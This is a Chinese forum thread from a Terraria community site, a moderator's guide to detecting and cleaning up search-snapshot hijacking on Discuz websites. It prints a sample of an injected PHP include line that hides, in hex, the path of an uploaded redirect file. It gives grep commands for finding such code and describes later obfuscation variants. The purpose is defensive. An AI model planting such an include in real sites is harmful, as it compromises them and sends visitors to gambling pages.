找回密码
 注册账号

QQ登录

只需一步,快速开始

《泰拉瑞亚下载-1.4.2.3版》 泰拉瑞亚服务器 - MOD模组下载

入驻泰拉战网 新手指引 - 升级 - 师徒

泰拉瑞亚合成表 泰拉卡牌 - 泰拉江湖 - 泰拉刺客

联系泰拉开发组👈进入 积分市场 - 房产交易 - 水晶获取

查看: 2309|回复: 1

discuz如何发现快照被劫持?该如何解决图文教程

[复制链接]

498

主题

18

回帖

5

广播

论坛版主

积分
257
泰拉
22
水晶
1
铜钥匙
0
银钥匙
0
金钥匙
0

【江湖新秀】【宝剑回鞘】【泰拉达人】【奥运选手】

发表于 2021-11-23 09:39:00 | 显示全部楼层 |阅读模式
技术交流
文章类型: 站长进阶
涉及领域: Discuz 
内容难度: 困难
前2天遇到两例discuz网站百度快照被劫持的例子,一般快照被劫持很难被发现。

被劫持的表现
site:域名
在搜索引擎中输入自己的网址,然后选择时间:【一月内】。出现被收录的帖子链接,点击后就跳转到博彩网站等。

image.png

解决方案
进discuz后台找到工具-文件校验,看下最近有哪些php文件被修改了。

1、排查网站源文件的php 文件,查看是否有出现IP地址、或者异常网站(上面跳转的网站),如果有删除就可以了。

2、排查网站源文件的php 文件,查看是否有如下代码:

@include($_SERVER['DOCUMENT_ROOT']
如果有就删除此段代码。并把该段代码进行解密。

举例:

@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30'));
需要解密的代码为:2F646174612F6176617461722F30

解密后为:/data/avatar/0

意思就是在上述路径下存在被非法上传的文件,用于做快照劫持。

解决办法:删除上面的代码和文件即可。

挂马问题解决了后,记得更改服务器相关的各种密码,尽量设置的复杂一点。

一般这种情况说明网站代码已被修改,下面提供一个思路,查找关键词pack

find /目录 -name '*.php' | xargs grep -i 'PACK('
find /目录 -name '*.html' | xargs grep -i 'PACK('
find /目录 -name '*.js' | xargs grep -i 'PACK('
以上仅是思路,具体还要根据代码分析。

获得 大福神卡 一张

卡片说明:君山 遇到 [好色的朝歌] 被啪啪啪了 94 完事之后他给你付了 泰拉.

卡片效果:获得 94 泰拉

498

主题

18

回帖

5

广播

论坛版主

积分
257
泰拉
22
水晶
1
铜钥匙
0
银钥匙
0
金钥匙
0

【江湖新秀】【宝剑回鞘】【泰拉达人】【奥运选手】

 楼主| 发表于 2021-11-23 09:41:36 | 显示全部楼层
关于黑客劫持 , 补充说明
我在网上找到这个方法时 , 这个方法已经进化了
他们会吧PACK 函数 , 用不同的函数包装成字母
然后通用e函数执行

为了混淆试听 , 干扰搜索 , 都起名为单字母函数

如 m() s() 等 , 反正写法变态思路清奇

当中还用了 13字母推进加密 , 还用了各种编码方式
简直不要太变态
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册账号

本版积分规则

QQ|友链申请|Archiver|手机版|小黑屋|游芯沙盒 ( 陕ICP备11006283号-1 )

GMT+8, 2024-5-6 05:40 , Processed in 0.122773 second(s), 46 queries .

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表